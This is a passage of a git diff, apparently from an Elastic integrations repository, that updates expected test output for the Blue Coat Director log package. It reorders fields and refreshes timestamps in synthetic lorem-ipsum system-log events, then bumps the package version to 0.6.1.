"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context vol: luptat", "event": { - "ingested": "2021-06-09T09:50:38.142206600Z" + "ingested": "2021-12-14T14:36:02.455694475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003ceumiu.medium\u003e Processing command: accept", "event": { - "ingested": "2021-06-09T09:50:38.142212600Z" + "ingested": "2021-12-14T14:36:02.455694839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context nci: ofdeFin", "event": { - "ingested": "2021-06-09T09:50:38.142219100Z" + "ingested": "2021-12-14T14:36:02.455695226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[6668]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142224500Z" + "ingested": "2021-12-14T14:36:02.455695588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[1613]: Normal exit mvolu", "event": { - "ingested": "2021-06-09T09:50:38.142229400Z" + "ingested": "2021-12-14T14:36:02.455695955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2959]: ntpd gelit-r tatno", "event": { - "ingested": "2021-06-09T09:50:38.142234600Z" + "ingested": "2021-12-14T14:36:02.455696317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[654]: Updated timestamp for job rmagni to sit", "event": { - "ingested": "2021-06-09T09:50:38.142240900Z" + "ingested": "2021-12-14T14:36:02.455696691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003ctenima.very-high\u003e Health state for metric\"seq3874.mail.domain\" \"quid\" changed to \"fug\", reason: \"success\"", "event": { - "ingested": "2021-06-09T09:50:38.142246200Z" + "ingested": "2021-12-14T14:36:02.455697267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[2067]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142251Z" + "ingested": "2021-12-14T14:36:02.455697654Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[5969]: \u003c\u003ctquovol.very-high\u003e check_license_validity(), tae", "event": { - "ingested": "2021-06-09T09:50:38.142256Z" + "ingested": "2021-12-14T14:36:02.455698011Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with temUten", "event": { - "ingested": "2021-06-09T09:50:38.142260800Z" + "ingested": "2021-12-14T14:36:02.455698369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : \u003c\u003cdun.medium\u003e error: Bind to port Duisau on psum failed: failure", "event": { - "ingested": "2021-06-09T09:50:38.142265900Z" + "ingested": "2021-12-14T14:36:02.455699341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cend.medium\u003e itaut@rveli: command: accept", "event": { - "ingested": "2021-06-09T09:50:38.142270700Z" + "ingested": "2021-12-14T14:36:02.455699852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cluptat.low\u003e authd_signal_handler(), quam", "event": { - "ingested": "2021-06-09T09:50:38.142282300Z" + "ingested": "2021-12-14T14:36:02.455700210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[6547]: Started working: onproide available services", "event": { - "ingested": "2021-06-09T09:50:38.142287Z" + "ingested": "2021-12-14T14:36:02.455700562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with tfug", "event": { - "ingested": "2021-06-09T09:50:38.142292Z" + "ingested": "2021-12-14T14:36:02.455700920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003curE.medium\u003e Processing command: deny", "event": { - "ingested": "2021-06-09T09:50:38.142297200Z" + "ingested": "2021-12-14T14:36:02.455701280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: rehe", "event": { - "ingested": "2021-06-09T09:50:38.142302700Z" + "ingested": "2021-12-14T14:36:02.455701636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : \u003c\u003cstiae.medium\u003e error: Bind to port erc on amqu failed: unknown", "event": { - "ingested": "2021-06-09T09:50:38.142369500Z" + "ingested": "2021-12-14T14:36:02.455702020Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[4515]: ntpd emp-r aperia", "event": { - "ingested": "2021-06-09T09:50:38.142377200Z" + "ingested": "2021-12-14T14:36:02.455702500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context run: vol", "event": { - "ingested": "2021-06-09T09:50:38.142383100Z" + "ingested": "2021-12-14T14:36:02.455702861Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with mporain", "event": { - "ingested": "2021-06-09T09:50:38.142388100Z" + "ingested": "2021-12-14T14:36:02.455703217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cmpori.very-high\u003e connect: atu", "event": { - "ingested": "2021-06-09T09:50:38.142393Z" + "ingested": "2021-12-14T14:36:02.455703578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003ctexp.medium\u003e cmd starting adeseru", "event": { - "ingested": "2021-06-09T09:50:38.142398200Z" + "ingested": "2021-12-14T14:36:02.455703931Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[7108]: \u003c\u003c-uam.low\u003e tmo@::fficiade:10.2.53.125 : CLI launched", "event": { - "ingested": "2021-06-09T09:50:38.142402700Z" + "ingested": "2021-12-14T14:36:02.455704301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[7061]: \u003c\u003cihilmo.very-high\u003e ntpd will start in tlabo", "event": { - "ingested": "2021-06-09T09:50:38.142407300Z" + "ingested": "2021-12-14T14:36:02.455704656Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poller[795]: \u003c\u003coluptate.low\u003e Querying content system for job results.", "event": { - "ingested": "2021-06-09T09:50:38.142412Z" + "ingested": "2021-12-14T14:36:02.455705009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[6134]: \u003c\u003cedo.very-high\u003e Processing command: allow", "event": { - "ingested": "2021-06-09T09:50:38.142416400Z" + "ingested": "2021-12-14T14:36:02.455705375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "epmd: : epmd: epmd running orpor", "event": { - "ingested": "2021-06-09T09:50:38.142420900Z" + "ingested": "2021-12-14T14:36:02.455705739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[602]: \u003c\u003cemvel.very-high\u003e Failed to exec olup", "event": { - "ingested": "2021-06-09T09:50:38.142427300Z" + "ingested": "2021-12-14T14:36:02.455706100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[2807]: shutting down non", "event": { - "ingested": "2021-06-09T09:50:38.142431800Z" + "ingested": "2021-12-14T14:36:02.455706592Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cugiatnu.high\u003e sperna@sintocc: command: cancel", "event": { - "ingested": "2021-06-09T09:50:38.142436Z" + "ingested": "2021-12-14T14:36:02.455706964Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[2986]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142440200Z" + "ingested": "2021-12-14T14:36:02.455707323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cccaecat.medium\u003e CREATE onsequ", "event": { - "ingested": "2021-06-09T09:50:38.142444200Z" + "ingested": "2021-12-14T14:36:02.455707670Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[1243]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142448100Z" + "ingested": "2021-12-14T14:36:02.455708026Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[6599]: Started working: naal available services", "event": { - "ingested": "2021-06-09T09:50:38.142452100Z" + "ingested": "2021-12-14T14:36:02.455708385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[5850]: Started working: rQu available services", "event": { - "ingested": "2021-06-09T09:50:38.142456100Z" + "ingested": "2021-12-14T14:36:02.455708744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cboree.low\u003e queips: undefined symbol: ncidi", "event": { - "ingested": "2021-06-09T09:50:38.142460100Z" + "ingested": "2021-12-14T14:36:02.455709093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003color.very-high\u003e authd_close(): npr", "event": { - "ingested": "2021-06-09T09:50:38.142469300Z" + "ingested": "2021-12-14T14:36:02.455709454Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[6373]: Anacron 1.3962 started on epre", "event": { - "ingested": "2021-06-09T09:50:38.142473500Z" + "ingested": "2021-12-14T14:36:02.455709867Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[3979]: \u003c\u003c-iduntu.medium\u003e temUt@avol752.www5.test : Processing command accept", "event": { - "ingested": "2021-06-09T09:50:38.142477500Z" + "ingested": "2021-12-14T14:36:02.455710242Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003camc.medium\u003e cmd starting isiuta", "event": { - "ingested": "2021-06-09T09:50:38.142481300Z" + "ingested": "2021-12-14T14:36:02.455710603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd[5227]: dutp(psaquaea:taevita): pam_putenv: ameiusm", "event": { - "ingested": "2021-06-09T09:50:38.142485Z" + "ingested": "2021-12-14T14:36:02.455710950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003colab.low\u003e Device elitse6672.internal.localdomain: mquisno", "event": { - "ingested": "2021-06-09T09:50:38.142488800Z" + "ingested": "2021-12-14T14:36:02.455711312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[1859]: \u003c\u003ctasnulap.high\u003e Failed to exec umSe", "event": { - "ingested": "2021-06-09T09:50:38.142492600Z" + "ingested": "2021-12-14T14:36:02.455711671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[6110]: shutting down itau", "event": { - "ingested": "2021-06-09T09:50:38.142496400Z" + "ingested": "2021-12-14T14:36:02.455712065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd[2415]: PAM lorsita more authentication failure; dolore", "event": { - "ingested": "2021-06-09T09:50:38.142500700Z" + "ingested": "2021-12-14T14:36:02.455712514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: tio", "event": { - "ingested": "2021-06-09T09:50:38.142504800Z" + "ingested": "2021-12-14T14:36:02.455712868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[802]: \u003c\u003c-gnaaliqu.very-high\u003e velillu@::cteturad:10.18.204.87 : Processing a secure command...", "event": { - "ingested": "2021-06-09T09:50:38.142508700Z" + "ingested": "2021-12-14T14:36:02.455713228Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003creprehe.high\u003e connect: inimveni", "event": { - "ingested": "2021-06-09T09:50:38.142512400Z" + "ingested": "2021-12-14T14:36:02.455713587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003clitani.low\u003e authd_close(): psumqu", "event": { - "ingested": "2021-06-09T09:50:38.142516200Z" + "ingested": "2021-12-14T14:36:02.455713943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[2558]: \u003c\u003cicabo.high\u003e Failed to exec edquiac", "event": { - "ingested": "2021-06-09T09:50:38.142520100Z" + "ingested": "2021-12-14T14:36:02.455714316Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[4538]: Updated timestamp for job remips to uisaute", "event": { - "ingested": "2021-06-09T09:50:38.142523900Z" + "ingested": "2021-12-14T14:36:02.455714678Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[6837]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142527800Z" + "ingested": "2021-12-14T14:36:02.455715032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[1493]: \u003c\u003cetdolor.high\u003e print_msg(), dic", "event": { - "ingested": "2021-06-09T09:50:38.142531800Z" + "ingested": "2021-12-14T14:36:02.455715389Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cavolupt.low\u003e Device \"itation4168.api.domain\" completed command(s) accept ;; CPL generated by Visual Policy Manager: isciv ;rroqu ; nofd ; dipisci", "event": { - "ingested": "2021-06-09T09:50:38.142535500Z" + "ingested": "2021-12-14T14:36:02.455715742Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "epmd: : epmd: invalid packet size (mquae)", "event": { - "ingested": "2021-06-09T09:50:38.142539300Z" + "ingested": "2021-12-14T14:36:02.455716102Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[429]: \u003c\u003ccorpori.very-high\u003e File reading failed", "event": { - "ingested": "2021-06-09T09:50:38.142543Z" + "ingested": "2021-12-14T14:36:02.455716760Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[7595]: shutting down emqu", "event": { - "ingested": "2021-06-09T09:50:38.142547100Z" + "ingested": "2021-12-14T14:36:02.455717149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cleumiur.low\u003e The HB command is accept", "event": { - "ingested": "2021-06-09T09:50:38.142550900Z" + "ingested": "2021-12-14T14:36:02.455717507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cest.very-high\u003e authd_signal_handler(), isetquas", "event": { - "ingested": "2021-06-09T09:50:38.142554800Z" + "ingested": "2021-12-14T14:36:02.455717874Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cpsaqua.medium\u003e authd_signal_handler(), gnaal", "event": { - "ingested": "2021-06-09T09:50:38.142558700Z" + "ingested": "2021-12-14T14:36:02.455718244Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with voluptas", "event": { - "ingested": "2021-06-09T09:50:38.142562800Z" + "ingested": "2021-12-14T14:36:02.455718603Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[627]: ntpd exiting on signal orin", "event": { - "ingested": "2021-06-09T09:50:38.142566500Z" + "ingested": "2021-12-14T14:36:02.455718958Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context ecillu: mmodoc", "event": { - "ingested": "2021-06-09T09:50:38.142570200Z" + "ingested": "2021-12-14T14:36:02.455719332Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[1140]: \u003c\u003c-abore.high\u003e modocon@ipsu3680.mail.test : Processing command: deny", "event": { - "ingested": "2021-06-09T09:50:38.142573900Z" + "ingested": "2021-12-14T14:36:02.455719689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : bad username mquisn", "event": { - "ingested": "2021-06-09T09:50:38.142577700Z" + "ingested": "2021-12-14T14:36:02.455720048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[1313]: ntpd derit-r orese", "event": { - "ingested": "2021-06-09T09:50:38.142581500Z" + "ingested": "2021-12-14T14:36:02.455720411Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003cleumiur.medium\u003e Device Communication Daemon online", "event": { - "ingested": "2021-06-09T09:50:38.142586500Z" + "ingested": "2021-12-14T14:36:02.455720774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: moles", "event": { - "ingested": "2021-06-09T09:50:38.142590500Z" + "ingested": "2021-12-14T14:36:02.455721131Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context olup: aco", "event": { - "ingested": "2021-06-09T09:50:38.142595400Z" + "ingested": "2021-12-14T14:36:02.455721616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[609]: shutting down ser", "event": { - "ingested": "2021-06-09T09:50:38.142599200Z" + "ingested": "2021-12-14T14:36:02.455721975Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2991]: ntpd orinrep-r quiavol", "event": { - "ingested": "2021-06-09T09:50:38.142603100Z" + "ingested": "2021-12-14T14:36:02.455722331Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cquin.medium\u003e inserted device id = sBonor2001.www5.example and serial number = amc into DB", "event": { - "ingested": "2021-06-09T09:50:38.142607Z" + "ingested": "2021-12-14T14:36:02.455722691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003came.very-high\u003e ccd_handle_read_failure(), uid", "event": { - "ingested": "2021-06-09T09:50:38.142610700Z" + "ingested": "2021-12-14T14:36:02.455723051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003cscivel.high\u003e cmd starting lmolesti", "event": { - "ingested": "2021-06-09T09:50:38.142614500Z" + "ingested": "2021-12-14T14:36:02.455723421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cemaperia.high\u003e inserted device id = ersp6625.internal.domain and serial number = seq into DB", "event": { - "ingested": "2021-06-09T09:50:38.142618Z" + "ingested": "2021-12-14T14:36:02.455723774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003ctanimid.medium\u003e cmd starting uipexe", "event": { - "ingested": "2021-06-09T09:50:38.142621800Z" + "ingested": "2021-12-14T14:36:02.455724147Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003core.low\u003e The HB command is cancel", "event": { - "ingested": "2021-06-09T09:50:38.142625300Z" + "ingested": "2021-12-14T14:36:02.455724509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[7360]: Normal exit tperspic", "event": { - "ingested": "2021-06-09T09:50:38.142629Z" + "ingested": "2021-12-14T14:36:02.455724869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003cict.very-high\u003e Filter on (tetura) things. riosamni", "event": { - "ingested": "2021-06-09T09:50:38.142633200Z" + "ingested": "2021-12-14T14:36:02.455725226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003cumetMa.low\u003e Device eleumiu2454.api.local: tat", "event": { - "ingested": "2021-06-09T09:50:38.142637800Z" + "ingested": "2021-12-14T14:36:02.455725583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "schedulerd: : \u003c\u003clumqu.very-high\u003e System time changed, recomputing job run times.", "event": { - "ingested": "2021-06-09T09:50:38.142642100Z" + "ingested": "2021-12-14T14:36:02.455725945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[3450]: Started working: aconsequ available services", "event": { - "ingested": "2021-06-09T09:50:38.142646300Z" + "ingested": "2021-12-14T14:36:02.455726317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003csequat.high\u003e handle_authd unknown message =utemvel", "event": { - "ingested": "2021-06-09T09:50:38.142650400Z" + "ingested": "2021-12-14T14:36:02.455726672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: iusm", "event": { - "ingested": "2021-06-09T09:50:38.142671300Z" + "ingested": "2021-12-14T14:36:02.455727034Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[16]: time reset stquido", "event": { - "ingested": "2021-06-09T09:50:38.142683500Z" + "ingested": "2021-12-14T14:36:02.455727396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ccd: : \u003c\u003caaliq.high\u003e Device olu5333.www.domain: orumSe", "event": { - "ingested": "2021-06-09T09:50:38.142689Z" + "ingested": "2021-12-14T14:36:02.455727747Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[80]: Normal exit ici", "event": { - "ingested": "2021-06-09T09:50:38.142693600Z" + "ingested": "2021-12-14T14:36:02.455728106Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[7612]: kernel time sync enabled nturmag", "event": { - "ingested": "2021-06-09T09:50:38.142698Z" + "ingested": "2021-12-14T14:36:02.455728457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[7128]: eseruntm(lpaquiof:oloreeu): pam_putenv: olor", "event": { - "ingested": "2021-06-09T09:50:38.142702Z" + "ingested": "2021-12-14T14:36:02.455728811Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "schedulerd: : \u003c\u003cici.very-high\u003e Executing Job \"tquo\" execution iatnu", "event": { - "ingested": "2021-06-09T09:50:38.142705800Z" + "ingested": "2021-12-14T14:36:02.455729174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with ntut", "event": { - "ingested": "2021-06-09T09:50:38.142709500Z" + "ingested": "2021-12-14T14:36:02.455729528Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poller[7151]: \u003c\u003cess.high\u003e Querying content system for job results.", "event": { - "ingested": "2021-06-09T09:50:38.142713200Z" + "ingested": "2021-12-14T14:36:02.455729908Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2314]: ntpd litanim-r rQuisaut", "event": { - "ingested": "2021-06-09T09:50:38.142716900Z" + "ingested": "2021-12-14T14:36:02.455730257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cmetco.high\u003e Processing command: block", "event": { - "ingested": "2021-06-09T09:50:38.142724Z" + "ingested": "2021-12-14T14:36:02.455730617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/bluecoat/manifest.yml b/packages/bluecoat/manifest.yml index 6d88e7bfbae..ce24025dc7f 100644 --- a/packages/bluecoat/manifest.yml +++ b/packages/bluecoat/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: bluecoat title: Blue Coat Director Logs -version: 0.6.0 +version: 0.6.1 description: Collect director logs from Blue Coat devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/cef/changelog.yml 